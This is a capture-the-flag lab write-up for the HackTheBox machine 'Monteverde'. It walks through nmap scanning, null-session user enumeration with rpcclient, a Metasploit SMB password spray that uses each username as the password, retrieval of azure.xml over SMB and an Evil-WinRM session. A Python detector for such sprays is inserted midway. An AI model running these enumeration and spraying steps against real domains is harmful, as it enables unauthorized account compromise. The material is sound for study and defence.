Ahmed Samir

Jun 18, 2020


HackTheBox — Monteverde

Summary

Enumeration

Nmap

root@strike:~# nmap -sC -sV 10.10.10.172
Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-18 00:51 EET
Nmap scan report for 10.10.10.172
Host is up (0.13s latency).
Not shown: 989 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-17 22:07:34Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=6/18%Time=5EEA9EAC%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -44m49s, deviation: 0s, median: -44m49s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-06-18 00:09:53
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 297.02 seconds
root@strike:~#
root@strike:~# rpcclient -U "" -N 10.10.10.172
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
rpcclient $> enumdomusers
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]
rpcclient $>

Exploitation

msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > set SMBDomain MEGABANK.LOCAL
SMBDomain => MEGABANK.LOCAL
msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE /root/Desktop/users.txt
USER_FILE => /root/Desktop/users.txt
msf5 auxiliary(scanner/smb/smb_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.172
rhosts => 10.10.10.172
msf5 auxiliary(scanner/smb/smb_login) > exploit

[*] 10.10.10.172:445 - 10.10.10.172:445 - Starting SMB login bruteforce
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK.LOCAL\Guest:Guest',
[!] 10.10.10.172:445 - No active DB -- Credential data will not be saved!
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK.LOCAL\AAD_987d7f2f57d2:AAD_987d7f2f57d2',
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK.LOCAL\mhope:mhope',
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK.LOCAL\dgalanos:dgalanos',
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK.LOCAL\roleary:roleary',
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK.LOCAL\smorgan:smorgan',
[+] 10.10.10.172:445 - 10.10.10.172:445 - Success: 'MEGABANK.LOCAL\SABatchJobs:SABatchJobs'
[*] 10.10.10.172:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_login) >
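The smb_login run above is a username-as-password spray: one source, one failed logon per enumerated account, then a success. As an added example (not code from the original write-up), the Python below shows the detection logic a defender would run over the domain controller's 4625/4624 logon events to catch that pattern; the event stream, source IPs and timestamps are constructed.

```python
"""Password-spray detection over Windows Security logon events.

Added example, not code from the original write-up. It models the smb_login
USER_AS_PASS run as the 4625 (failed logon) / 4624 (successful logon) events a
domain controller records and flags what a defender should alert on: one
source failing against many distinct accounts in a short window, then
succeeding. Event IDs are the Windows Security log's; IPs and times are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: (timestamp, event_id, target_user, source_ip).
SAMPLE_EVENTS = [
    ("2020-06-18T00:55:01", 4625, "Guest", "10.10.14.5"),
    ("2020-06-18T00:55:01", 4625, "AAD_987d7f2f57d2", "10.10.14.5"),
    ("2020-06-18T00:55:02", 4625, "mhope", "10.10.14.5"),
    ("2020-06-18T00:55:02", 4625, "dgalanos", "10.10.14.5"),
    ("2020-06-18T00:55:03", 4625, "roleary", "10.10.14.5"),
    ("2020-06-18T00:55:03", 4625, "smorgan", "10.10.14.5"),
    ("2020-06-18T00:55:04", 4624, "SABatchJobs", "10.10.14.5"),
    # Benign noise: one user mistypes a password twice, then logs in.
    ("2020-06-18T00:56:10", 4625, "mhope", "10.10.20.7"),
    ("2020-06-18T00:56:20", 4625, "mhope", "10.10.20.7"),
    ("2020-06-18T00:56:30", 4624, "mhope", "10.10.20.7"),
]


def detect_spray(events, min_users=5, window=timedelta(minutes=5)):
    """Return {source_ip: {"attempted": [...], "compromised": [...]}}.

    A source is a spray when at least `min_users` distinct accounts fail
    from it inside any `window`; accounts that later succeed (4624) from
    the same source are reported as compromised.
    """
    by_src = defaultdict(list)
    for ts, eid, user, src in events:
        by_src[src].append((datetime.fromisoformat(ts), eid, user))
    findings = {}
    for src, evs in by_src.items():
        evs.sort()
        fails = [(t, u) for t, e, u in evs if e == 4625]
        for i, (t0, _) in enumerate(fails):
            users = {u for t, u in fails[i:] if t - t0 <= window}
            if len(users) >= min_users:
                hits = {u for t, e, u in evs if e == 4624 and t >= t0}
                findings[src] = {"attempted": sorted(users),
                                 "compromised": sorted(hits)}
                break
    return findings
```

The single user on 10.10.20.7 who mistypes a password is below the distinct-account threshold and is not reported; the Metasploit-style burst is, together with the account it ended up logging in as.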
root@strike:~# smbclient -U 'SABatchJobs' //10.10.10.172/users$
WARNING: The "encrypt passwords" option is deprecated
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
WARNING: The "null passwords" option is deprecated
Enter WORKGROUP\SABatchJobs's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jan 3 15:12:48 2020
.. D 0 Fri Jan 3 15:12:48 2020
dgalanos D 0 Fri Jan 3 15:12:30 2020
mhope D 0 Fri Jan 3 15:41:18 2020
roleary D 0 Fri Jan 3 15:10:30 2020
smorgan D 0 Fri Jan 3 15:10:24 2020

524031 blocks of size 4096. 519955 blocks available
smb: \> cd mhope
smb: \mhope\> ls
. D 0 Fri Jan 3 15:41:18 2020
.. D 0 Fri Jan 3 15:41:18 2020
azure.xml AR 1212 Fri Jan 3 15:40:23 2020

524031 blocks of size 4096. 519955 blocks available
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (3.3 KiloBytes/sec) (average 3.3 KiloBytes/sec)
smb: \mhope\>

Privilege Escalation

*Evil-WinRM* PS C:\Users\mhope\Desktop> net users mhope
User name mhope
Full Name Mike Hope
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 1/2/2020 4:40:05 PM
Password expires Never
Password changeable 1/3/2020 4:40:05 PM
Password required Yes
User may change password No

Workstations allowed All
Logon script
User profile
Home directory \\monteverde\users$\mhope
Last logon 6/17/2020 3:58:24 PM

Logon hours allowed All

Local Group Memberships *Remote Management Use
Global Group memberships *Azure Admins *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\mhope\Desktop>

Thanks for your time!